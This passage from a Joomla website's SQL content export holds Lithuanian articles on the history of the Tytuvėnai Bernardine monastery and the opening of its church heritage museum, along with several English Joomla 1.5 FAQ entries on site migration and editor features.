Šventųjų laiptų pakopose. Tytuvėnų bernardinų vienuolyno gvardijonas Antanas Burnickis yra aprašęs šią savo kelionę į Jeruzalę. XIX a. viduryje tik nedidelis kelionės aprašymo skyrius buvo publikuotas. Tokie užrašai būtų įdomus piligrimystės liudijimas. Tikėtina, kad jie yra saugomi Lenkijos bernardinų archyvuose ir, galbūt, kada nors atsiras galimybė, nuvalius užmaršties dulkes, juos paskelbti.<br />Įdomus ir mažai tyrinėtas Tytuvėnų bažnyčios ir bernardinų vienuolyno istorijos puslapis yra 1831m. 1863m. sukilimai. <br />1831 m. Tytuvėnai buvo vienas iš sukilėlių centrų. Vienuolynas bei ūkiniai pastatai buvo įtvirtinti gynybai, įrengtos šaudymo angos. Tąkart, sukilimui pralaimėjus, caro valdžia Tytuvėnų vienuolių nelietė.<br />1863 m., prasidėjus antram sukilimui, netoli miestelio vyko mūšiai, todėl daugelis tytuvėniškių stojo į sukilėlių gretas. Numalšinus sukilimą, caro valdininkai apkaltino vienuolius rėmus sukilėlius, ir 1864 m. vienuolyną uždarė. Tuo laiku Lietuvoje buvo uždarytos 32 bažnyčios ir 20 vienuolynų. <br />Kauno gubernatoriaus įsakymu buvo nurodyta Tytuvėnų bažnyčią ir vienuolyno pastatus atiduoti atvykstantiems rusams kolonijistams. Iškilo grėsmė  ansambliui  išlikti. Vyskupo Motiejaus Valančiaus ir tytuvėniškių atkaklių pastangų dėka bažnyčia buvo išsaugota. Šis sėkmė anuomet  buvo padrąsinimas visiems  Lietuvos katalikams priešintis rusinimo politikai ,ginti  tautos teises ir laisvę.</span></p>\n<p><span style=\"font-family: tahoma,arial,helvetica,sans-serif;\"><br /></span></p>\n<p><strong><span style=\"font-family: tahoma,arial,helvetica,sans-serif;\">Ekspozicijų tematika</span></strong></p>\n<p><span style=\"font-family: tahoma,arial,helvetica,sans-serif;\">1. Sakralinis barokas.<br />Ekspozicije pristatomas Tytuvėnų bernardinų bažnyčios ir vienuolyno ansamblis, jo istorinė, architektūrinė, meninė vertė; parodomas jo ryšys su kitais vyskupijos teritorijoje ir už jos ribų esančiais sakralinio baroko objektais.  Supažindinama su „Baroko kelias Lietuvoje“ turistiniais maršrutais.<br />Svarbią vietą ekspozicije užims kulto apeigose šiuo metu nenaudojami vertingi sakralinio meno daiktai (taurės, monstrancijos, relikvijoriai, kryžiai, žvakidės, liturginiai rūbai ir kt.)<br />2. Ikonografija.<br />Kartu su auksakalystės, liturginių rūbų ir kitomis vertybėmis muziejuje būtų eksponuojama <br />Tytuvėnų vienuolyne ir bažnyčioje esančių portretų kolekcija, tai pat Lietuvos muziejuose esantys portretai. Pristatomas ir religinis liaudies menas – paprastų žmonių pamaldumą liudijanti krikščioniškojo Lietuvos meno dalis. Didesnė šių eksponatų dalis deponavimo teise būtų gautos iš Lietuvos dailės muziejaus fondų.<br />Eksponuojami išlikę bernardinų gyvenimo ir apeigų daiktai.<br />3. Bernardinų (mažesniųjų brolių observantų: OFM) veikla.<br /></span></p>','',0,0,0,48,'2011-04-08 12:53:11',135,'','2011-10-31 20:37:36',135,0,'0000-00-00 00:00:00','2011-04-08 12:53:11','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"1\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_section\":\"0\",\"link_section\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_vote\":\"0\",\"show_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"lt-LT\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',10,0,1,'','',1,637,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(154,238,'Atidarytas Šiaulių vyskupijos bažnytinio paveldo muziejus','atidarytasmuziejus','','<div style=\"text-align: right;\"><a href=\"http://www.youtube.com/watch?v=PQSzycO0_Bw\" target=\"_blank\">Filmukas apie atidarymo šventę </a></div>\n<p><br /><br />Baigiamame restauruoti Tytuvėnų bernardinų vienuolyne birželio 11 d. atidarytas Šiaulių vyskupijos bažnytinio paveldo muziejus.  Iškilmės prasidėjo 11 val. padėkos šv. Mišiomis. Jas aukojo Šiaulių vyskupas Eugenijus Bartulis, Kauno arkivyskupas metropolitas Sigitas Tamkevičius, Telšių vyskupas Jonas Boruta, Šiaulių vyskupijos kunigai.<br /><br />Oficialus muziejaus  atidarymo renginys vyko uždarame vienuolyno kiemelyje. Jame taip pat dalyvavo kultūros ministras Arūnas Gelūnas, Kultūros paveldo departamento direktorė Diana Varnaitė, Kelmės meras Kostas Arvasevičius, Seimo nariai, Kelmės garbės piliečiai, Kelmės miesto bei rajono valdžios atstovai, mokslininkai, verslininkai, parapijiečiai bei iš toliau atvykę miestelio svečiai.<br /><br />Šventės vedančioji Nijolė Saimininkienė priminė istorinius įvykius, kuomet 1614 metų gegužės 1 dieną Andriejus Valavičius, Vilniaus didikas, Tytuvėnų miestelio savininkas, Tryškiuose pasirašė fundacijos aktą dėl naujos bažnyčios bei vienuolyno statybos. Šitam dokumentui netrukus sukaks 400 metų.<br /><br />Ansamblis  pastatytas nuošalioje vietovėje, galbūt todėl  mažai nukentėjo nuo karų, čia niekada nesiautėjo gaisrai, buvo išvengta esminių perstatymų. Vienuolyno ir bažnyčios ansamblis pripažįstamas vienu vertingiausių barokinių ansamblių Lietuvoje ir visoje Šiaurės rytų Europoje. Baigiamas restauruoti renesansinis vienuolyno rūmas  gausiai išpuoštas ornamentine ir figūrine sienų tapyba, kurios siužetai iliustruoja Jėzaus Kristaus gyvenimo ir kančios kelią, tai yra autentiška aplinka ir pagrindas muziejaus ekspozicijoms.<br /><br />Kauno arkivyskupas metropolitas Sigitas Tamkevičius pabrėžė Katalikų bažnyčios vaidmenį išsaugant šį milžinišką kultūrinį paveldą. „Manau, kad Lietuva turi būti dėkinga katalikų bažnyčiai už milžinišką paveldą, kurį turime. Jei iš to paveldo atimtume bažnyčias ir vienuolynus, nedaug ką — pilis, dvarus — turėtume parodyti atvykstantiems į Lietuvą“, — tvirtino arkivyskupas. Jis pažymėjo, kad bažnyčia už tą paveldą turi jausti ir didelę atsakomybę, juo rūpintis, neapleisti.<br /><br />Kultūros ministras Arūnas Gelūnas vienuolyną vadino vienu didžiausių mūsų kultūros perlų, kuris „puikiai papuoštų bet kurį Europos kraštą“. Bažnytinio paveldo muziejaus atidarymas – „tikrai puiki proga prisiminti, ką Lietuvai davė krikščionybė, Bažnyčia, tikėjimas“, — sakė kultūros ministras. <br /><br />Kultūros paveldo departamento direktorė Diana Varnaitė sakė: „Nuostabu, jei čia sugrįžtų vienuoliai, tačiau šiandien pasirinktas optimaliausias būdas, kuris suteikia dvasinę tvirtybę, sugrąžina dvasios vertybes“.<br /><br />Kelmės rajono meras Kostas Arvasevičius teigė, kad festivaliais, piligrimyste žymiuose Tytuvėnuose atlikti darbai įprasmina tai, kas mums brangu ir artima. Restauratorių darbu džiaugėsi Lietuvos dailės muziejaus direktorius Romualdas Budrys, dar studentu būdamas lankęs šias apylinkes, matęs pastatų būklę. <br /><br />UAB „Restauracija“ vadovas Kęstutis Vaišnoras prisiminė dažnai ant pastolių matęs Šiaulių vyskupą Eugenijų Bartulį, besikalbantį su restauratoriais. Nėra tokio žmogaus Kelmėje, mažo ir seno, kurie nepažintų šilto ir malonaus mūsų vyskupo, sakė Kelmės savivaldybės administracijos direktorius Zenonas Mačernius.<br /><br />Architektė Regina Tumpienė pasidžiaugė savo kolektyvu, kuris dirbo atsakingai, kantriai ir su meile. Individualios firmos „Agrotech“ savininkas Petras Račkauskas pabrėžė nuolatinį vyskupijos kanclerio Evaldo Alūzos bei Tytuvėnų piligrimų centro direktoriaus Prano Jurkaičio rūpestį. Padėkos žodžiai tarti Tytuvėnų parapijos klebonui Rimantui Žaromskiui.<br /><br />Garbingiems svečiams buvo įtekti  proginiai medaliai šiam įvikiui atminti. Šiaulių Vyskupas Eugenijus Bartulis pašventino senąjį vienuolyno pastatą, vėliau buvo apžiūrėtas muziejus. Jo ekspozicijoms skirta buvusi vienuolyno biblioteka; mažoji salė, kurioje, istorikų įsitikinimu, buvo vienuolyno vaistinės laboratorija; dalis koridoriaus, kuriuo buvo einama į noviciato rūmą. Nors muziejus dar labai jaunas, tačiau jo ekspozicije jau galima pamatyti išskirtiniausius Šiaulių vyskupijos bažnyčių liturginius reikmenis, liturginius rūbus, skulptūras, paveikslus, galima apsilankyti autentiškoje vienuolio celėje.</p>','',-2,0,0,48,'2011-06-27 08:27:49',135,'','2011-10-31 20:34:23',135,0,'0000-00-00 00:00:00','2011-06-27 09:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',9,0,2,'','',1,893,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(155,239,'Kelmės regiono turizmo traukos objektas','traukos-objektas','','<p style=\"TEXT-ALIGN: left\"> <br />Tytuvėnų bažnyčios ir bernardinų vienuolyno ansamblis – tai pagrindinis Kelmės regiono turizmo traukos objektas, kuris turi didžiulę istorinę, meninę, kultūrinę, religinę/sakralinę išliekamąją vertę. Bažnyčios ir bernardinų vienuolyno ansamblį sudaro net 11 į kultūros vertybių registrą įrašytų atskirų objektų.<br /><br />2008 metų spalio 27 dienos ūkio ministro įsakymu projektas „Tytuvėnų bernardinų vienuolyno ansamblio pritaikymas turizmo reikmėms“ buvo įtrauktas į Valstybės planuojamų turizmo projektų, finansuojamų iš 2007 m. - 2013 m. Europos Sąjungos paramos lėšų, sąrašą. Pagrindinis projekto tikslas buvo kompleksiškai pritaikyti Tytuvėnų Švenčiausiosios Mergelės Marijos bažnyčios ir bernardinų vienuolyno ansamblį turizmui, išlaikant objekto unikalumą ir autentiškumą, sukurti sąlygas privačioms investicijoms, piligrimystę ir turizmą skatinančioms, palaikančioms bei aptarnaujančioms paslaugoms ir veikloms vykdyti. Pradėjus eksplotuoti objektą bus sumažintas turizmo sezoniškumas, kadangi kultūros paveldo objektas vertingas ne tik savo išore, bet ir vidaus ekspozicija. Vienuolyne įkurtas Šiaulų vyskupijos bažnytinio paveldo muziejus. Pagrindinė muziejaus ekspozicijų salė įsikurs buvusioje vienuolyno bibliotekoje, joje bus eksponuojami liturginiai reikmenys iš Šiaulių vyskupijos bažnyčių, kitose celėse galėsime parodyti paveikslus, skulptūras iš Tytuvėnų bažnyčios.</p>\n<p style=\"TEXT-ALIGN: left\"> </p>\n<p style=\"TEXT-ALIGN: right\">VšĮ „Tytuvėnų piligrimų centro“ informacija</p>','',-2,0,0,51,'2011-06-27 10:00:00',135,'','2011-10-31 19:51:32',135,0,'0000-00-00 00:00:00','2011-06-27 10:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',30,0,1,'','',1,579,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(156,240,'How do I upgrade to Joomla! 1.5 ?','how-do-i-upgrade-to-joomla-15','','<p>Joomla! 1.5 does not provide an upgrade path from earlier versions. Converting an older site to a Joomla! 1.5 site requires creation of a new empty site using Joomla! 1.5 and then populating the new site with the content from the old site. This migration of content is not a one-to-one process and involves conversions and modifications to the content dump.</p> <p>There are two ways to perform the migration:</p>','<div id=\"post_content-107\"><li>An automated method of migration has been provided which uses a migrator Component to create the migration dump out of the old site (Mambo 4.5.x up to Joomla! 1.0.x) and a smart import facility in the Joomla! 1.5 Installation that performs required conversions and modifications during the installation process.</li> <li>Migration can be performed manually. This involves exporting the required tables, manually performing required conversions and modifications and then importing the content to the new site after it is installed.</li>  <p><!--more--></p> <h2><strong> Automated migration</strong></h2>  <p>This is a two phased process using two tools. The first tool is a migration Component named <font face=\"courier new,courier\">com_migrator</font>. This Component has been contributed by Harald Baer and is based on his <strong>eBackup </strong>Component. The migrator needs to be installed on the old site and when activated it prepares the required export dump of the old site\'s data. The second tool is built into the Joomla! 1.5 installation process. The exported content dump is loaded to the new site and all conversions and modification are performed on-the-fly.</p> <h3><u> Step 1 - Using com_migrator to export data from old site:</u></h3> <li>Install the <font face=\"courier new,courier\">com_migrator</font> Component on the <u><strong>old</strong></u> site. It can be found at the <a href=\"http://joomlacode.org/gf/project/pasamioprojects/frs/\" target=\"_blank\" title=\"JoomlaCode\">JoomlaCode developers forge</a>.</li> <li>Select the Component in the Component Menu of the Control Panel.</li> <li>Click on the <strong>Dump it</strong> icon. Three exported <em>gzipped </em>export scripts will be created. The first is a complete backup of the old site. The second is the migration content of all core elements which will be imported to the new site. The third is a backup of all 3PD Component tables.</li> <li>Click on the download icon of the particular exports files needed and store locally.</li> <li>Multiple export sets can be created.</li> <li>The exported data is not modified in anyway and the original encoding is preserved. This makes the <font face=\"courier new,courier\">com_migrator</font> tool a recommended tool to use for manual migration as well.</li> <h3><u> Step 2 - Using the migration facility to import and convert data during Joomla! 1.5 installation:</u></h3><p>Note: This function requires the use of the <em><font face=\"courier new,courier\">iconv </font></em>function in PHP to convert encodings. If <em><font face=\"courier new,courier\">iconv </font></em>is not found a warning will be provided.</p> <li>In step 6 - Configuration select the \'Load Migration Script\' option in the \'Load Sample Data, Restore or Migrate Backed Up Content\' section of the page.</li> <li>Enter the table prefix used in the content dump. For example: \'jos_\' or \'site2_\' are acceptable values.</li> <li>Select the encoding of the dumped content in the dropdown list. This should be the encoding used on the pages of the old site. (As defined in the _ISO variable in the language file or as seen in the browser page info/encoding/source)</li> <li>Browse the local host and select the migration export and click on <strong>Upload and Execute</strong></li> <li>A success message should appear or alternately a listing of database errors</li> <li>Complete the other required fields in the Configuration step such as Site Name and Admin details and advance to the final step of installation. (Admin details will be ignored as the imported data will take priority. Please remember admin name and password from the old site)</li> <p><u><br /></u></p></div>',-2,0,0,51,'2008-07-30 20:27:52',135,'','2008-07-30 20:27:52',135,0,'0000-00-00 00:00:00','2006-09-29 12:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',10,0,0,'','',1,15,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(157,241,'What happened to the locale setting?','what-happened-to-the-locale-setting','','This is now defined in the Language [<em>lang</em>].xml file in the Language metadata settings. If you are having locale problems such as dates do not appear in your language for example, you might want to check/edit the entries in the locale tag. Note that multiple locale strings can be set and the host will usually accept the first one recognised.','',-2,0,0,51,'2008-08-06 16:47:35',135,'','2008-08-06 16:47:35',135,0,'0000-00-00 00:00:00','2006-10-05 14:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',7,0,0,'','',1,12,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(158,242,'Only one edit window! How do I create \"Read more...\"?','only-one-edit-window-how-do-i-create-read-more','','<p>This is now implemented by inserting a <strong>Read more...</strong> tag (the button is located below the editor area) a dotted line appears in the edited text showing the split location for the <em>Read more....</em> A new Plugin takes care of the rest.</p><p>It is worth mentioning that this does not have a negative effect on migrated data from older sites. The new implementation is fully backward compatible.</p>','',-2,0,0,51,'2008-08-06 19:29:28',135,'','2008-08-06 19:29:28',135,0,'0000-00-00 00:00:00','2006-10-05 14:00:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',7,0,0,'','',1,21,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(159,243,'Tytuvėnų bernardinų vienuolynas','bernardinuvienuolynas','','<p><br />Pirmieji vienuolynai Žemaitijoje įsikūrė vėlai, tik 17 amžiaus pirmoje pusėje. Pirmoji didelė fundacija buvo žemaičių seniūno, LDK etmono, grafo Jono Karolio Chodkevičiaus. 1602 m. į Kretingą jis pasikvietė Šv. Pranciškaus Mažesniųjų brolių observantų, dar vadinamų bernardinais, vienuolius.</p>\n<p><br /><strong>BERNARDINAI ĮSIKURIA TYTUVĖNUOSE</strong><br /><br />1614m. LDK vėliavininkas, Žemaičių žemės teisėjas Andrius Valavičius pasirašo fundacijos aktą, pakviesdamas bernardinų vienuolius į Tytuvėnus. Pirmieji atgailautojų ir elgetautojų ordino vienuoliai atvyko iš Vilniaus, Kauno, Krokuvos vienuolynų. Deja, fundatoriui mirus, bažnyčios ir vienuolyno namų statyba pradedama tik 1618m. Broliai bernardinai, laikinai prisiglaudę Tytuvėnų dvare, o mišias aukodami mažytėje, medinėje Šv. Jurgio bažnytėlėje, jau pirmaisiais metais pradeda misijinį, evangelizacinį darbą, kovoja su Reformacija, stengiasi atitraukti gyventojus nuo dar gyvavusios pagonybės. Bernardinai moko žmones tikėjimo tiesų, teikia sakramentus, sako pamokslus netik lenkų bet ir lietuvių kalba. Pradedamos kaupti pirmosios knygos, davusios pradžią vienai iš didžiausių Žemaitijos bibliotekų. O kunigas Simonas Očko, vienuolyno vikaras, atvykęs į Tytuvėnus iš Krokuvos, ir kronikoje apsakomas kaip „buklus daržininkas“, užveisia didžiulį vaismedžių sodą prie bažnyčios ir vienuolyno sienų.<br /><br />Vienuolyno gyvenamasis namas, tikriausiai, buvo baigtas statyti 1633m. Tai vėlyvojo renesanso architektūros statinys. Pastatas pasagos formos, jungiasi su bažnyčios pietine siena. Tarp pastatų susidaro jaukumu ir ramybe dvelkiantis vidinis kiemelis. Vienuolynas dviaukštis. Pirmame aukšte patalpos erdvios, aukštos, čia gyveno vienuolyno vyresnysis, buvo įrengtas reflektorius (valgomasis), didelė virtuvė, o po ja, rūsiai maistui laikyti. Antrajame vienuolyno namo aukšte-kuklios, cilindriniais skliautais, dengtos vienuolių celės, bibliotekos patalpa, dvi svetainės.<br /><br />1635m. baigta Tytuvėnų bernardinų vienuolyno bažnyčia buvo konsekruota Angelų Švč. Mergelės Marijos titulu. Dievo Motina yra pranciškonų ordino globėja ir jie per amžius skleidė Švč. Mergelės Marijos nekalto prasidėjimo kultą. Kadangi vienuolyno bažnyčia, komplekse užima tokią vietą, kad būtų lengvai pasiekiama netik pasauliečiams lankytojams, maldininkams, bet ir vienuoliams, vienuolyno pastate įrengtas ir iki šių dienų iš likęs vienpusis koridorius. Juo greitai ir patogiai galima pasiekti bet kurią patalpą. Iš antrojo aukšto, vienuoliai, ilgu, šviesiu koridoriumi, patekdavo į vienuolių chorą-tai bažnyčios erdvė už didžiojo altoriaus. Vienuolių chore, bendruomenė rinkdavosi maldai. Istoriniai šaltiniai liudija, kad bernardinai bene ilgiausiai puoselėjo senąsias observantų ordino tradicijas, bendrai kalbėdami ir giedodami įvairias maldas, Liturgines valandas(Aušrinę - vidurnaktį, prima - 6 val. ryto, tertia - po konventualinių Mišių, vidurdienį - sextą, vakare - kompletą, švenčių dienomis-vakarais giedami mišparai) .Nuolatinė malda ir giedamos psalmės, skambančios bažnyčios erdvėje, kiekvieną čia įėjusį pasitikdavo ramybė ir Dievo artumas.<br /><br />17 amž. pabaigoje per Žemaitiją persirito viena po kitos nelaimės: maras, karas su Rusija, prasidėjęs karas su Švedija.</p>\n<p><br /><strong>ANTRASIS ŠIMTMETIS</strong><br /><br />18 amž. pradžioje jau kita Šv. Pranciškaus pasekėjų karta. kėlė iš griuvėsių ir vargų konventą, vėl puošė savo šventovę, skelbė Dievo žodį ir kvietė žmones arčiau. Jo. Išlikusioje vienuolyno kronikoje įrašas byloja: „1735 Viešpaties metais. Tais metais laimingai, nors ir su dideliais vargais, bažnyčios stogą ir bokštus pabaigėme[...]. Taip pat storlentėmis išklotą visą priebažnytį ir pradedant nuo didžiųjų bažnyčios durų iki vienuolyno vartų liepiau įvairiais atvaizdais ištapyti, kad pavergtų žmonių širdis...“ Tai liudija apie sieninę tapybą, kurią tarytum miražą regime ir šiandien.. Patalpų sienos buvo ištapytos biblijinėmis scenomis, Kristaus, Marijos, pranciškonų vienuolijos monogramomis, gėlių šakelių ornamentais, tai nuteikdavo maldai ir kontempliacijai.<br /><br />1736 m. Tytyvėnų vienuolyne įsteigiama mokymo institucija-noviciatas. Jaunų žmonių apsigyvenimas suteikė vienuolynui šurmulio ir gyvumo. Tikėtina, kad kaip ir kitose bernardinų bažnyčiose evangelinius įvykius pamaldų metu, iliustruodavo vaidybiniai intarpai. Tikinčiuosius sutraukdavo puošnios bernardinų mišios, spalvingos procesijos, kuriose dalyvaudavo ir bažnytinės brolijos. Iš brolijų seniausia buvo Šv. Onos įkurta dar 1617 m. Vėliau buvo įsteigtos Šv. Barboros, Švč. Mergelės Marijos Nekalto Prasidėjimo, Šv. Pranciškaus Serafiniškojo ir Šv. Antano Paduviečio draugijos. Vienuoliai kartu su brolijų nariais savo gyvenimo pagal evangeliją pavyzdžiu siekė palaikyti visuomenėje tikėjimą ir ugdyti katalikiškas vertybes.<br /><br />XVII a. amžiaus viduryje bernardinai rekonstruoja bažnyčios interjerą. Nors griežta Pranciškonų ordino regula skelbia neturtą, tačiau bernardinai niekada neslėpė, kad moka mylėti ir puoselėti grožį, kuris stebina, džiugina maldininką ir šiandien pravėrusį Dievo namų duris. Mergelės Marijos angelų karalienės bažnyčioje sukuriamas devynių altorių, krikštyklos ir sakyklos itin puošnus vėlyvojo baroko ansamblis. O amžiaus pabaigoje, gvardijono Jeronimo Franickio rūpesčiu už suaukotas lėšas .pastatomi nauji vargonai, kurių puikaus gaudesio galime klausyti ir šiandien. Tai seniausi autentiški, veikiantys vargonai Žemaitijoje.<br /><br />Kadangi mažesniųjų Pranciškaus brolių charizma yra ir rūpestis ligoniais ir atstumtaisiais, prie vienuolyno įkuriama špitolė, kur vienuolių išlaikomi gyveno pavargėliai. Tikėtina, kad prie špitolės glaudės ir pradžios mokykla.<br /><br />1771-1780 m. prieš bažnyčią pastatomos arkadinės galerijos, kuriose įrengiamos Kryžiaus kelio stotys. Vienuolis Antanas Burnickis iš Jeruzalės į Tytuvėnus parvežė žemės - tai relikvija, kurią kažkada lietė Išganytojo kojos, jam nešant kryžių į Golgotos kalną. Ši žemė buvo išdėstyta tikliniuose gaubteliuose po Kryžiaus kelio stočių atvaizdais. Tuo pačiu laikotarpiu, tarytum nuostabus relikvijorius, arkadinių galerijų kiemo centre, iškyla Šventųjų laiptų koplyčia, kur kiekvienos akmeninės pakopos viduryje įdedamos relikvijos - suteikiančios koplyčiai Viešpaties kančios paliudijimą. Bernardinų vienuolių rūpesčiu, šios relikvijos, jau du šimtmečius simboliškai jungia tolimą Šventąją Žemę ir mažą Žemaitijos miestelį. Su Tytuvėnų vienuolyno Kalvarija siejasi piligrimystės reiškinys išlikęs iki šių dienų. Kaip simbolinė Naujoji Jeruzalė- Tytuvėvų Kryžiaus kelias suformavo šiai vietovei būdingą kančios kelio stočių pamaldumo formą, kurią nūdien bandoma prisiminti ir atgaivinti.</p>\n<p><br /><strong>PASKUTINIS PENKIASDEŠIMTMETIS</strong><br /><br />Istorijos ratui sukantis Tytuvėnų bernardinų vienuolynui artėjo dar sunkesni laikai.<br /><br />Po 1795m. trečiojo Lietuvos Lenkijos respublikos padalijimo, Lietuva patenka Rusijos carų valdžion. Rusija siekdama greičiau asimiliuoti prisijungtas žemes pradeda varžyti Katalikų Bažnyčios teises ir veiklos laisvę. Valdžia įvairiomis instrukcijomis kišosi į vienuolynų vidaus gyvenimą.<br /><br />1829 m. įsigalioja naujos stojimo į vienuolyną taisyklės, pagal kurias leidimo reikėjo prašyti administracinės valdžios, o galutinį sprendimą priimdavo Peterburge veikusi dvasinių reikalų valdyba. Tuoj po to uždaromas noviciatas Tytuvėnuose.<br /><br />1831m. Tytuvėnų apylinkėse veikė sukilėliai turėję šovinių ir patrankų sviedinių dirbtuvę, o vienuolyne įsirengę ligoninę. Vienuolynas ir kiti mūriniai pastatai buvo įtvirtinti gynybai, įrengtos šaudymo angos. Numalšinus sukilimą, caro valdžia apkaltinusi parama sukilėliams uždarė daugelį Lietuvos vienuolynų, tačiau Tytuvėnų bernardinų nelietė, priskirdama etatinių kategorijai.<br /><br />1841 m. įsaku Rusijos vyriausybė konfiskuoja vienuolynų žemės nuosavybę (fundatoriaus valia Tytuvėnų vienuolynui buvo užrašyta 17 valakų, 22 margai, 196 rykštės - apie 350 ha žemės), už ją pradėta mokėti algas pinigais. Vienuolynai neteko savivaldos – buvo panaikinta provincijolo pareigybė. 1850 m. Motiejus Valančius įšventinamas vyskupu. Jo veikla padarė didelę įtaką dvasininkijai ir visai žemaičių visuomenei. Jis sugebėjo legaliomis priemonėmis, spirtis rusintojų užmačioms. Vyskupo laiškai, kviečiantys žmones atsisakyti degtinės, steigti blaivybės brolijas, ir dar karščiau visiems susitelkti maldoje, yra išlikę vienuolyno archyve.<br /><br />Socialinio ir tautinio nepasitenkinimo banga pradeda 1863 m. sukilimą. Jame dalyvavo daug Lietuvos kunigų ir vienuolių Netoli Tytuvėnų vyko net keletas mūšių su rusų kariuomene. Zigmantas Citavičius, Raseinių apskrities karinis viršininkas buvo įsirengęs sukilėlių stovyklą. Caro valdžia apkaltino vienuolius dalyvavus mūšiuose ir teikus paramą sukilėliams Generalgubernatoriaus M.Muravjovo įsakymu vienuolynas uždaromas, gvardijonas Andriejus Petravičius areštuojamas.ir ištremiamas į Sibirą. 250 metų Tytuvėnuose savo namus turėję vienuoliai, priverčiami išsikelti į vienintelį likusį Kretingos vienuolyną.<br /><br />Visų praėjusių sunkmečių laikais 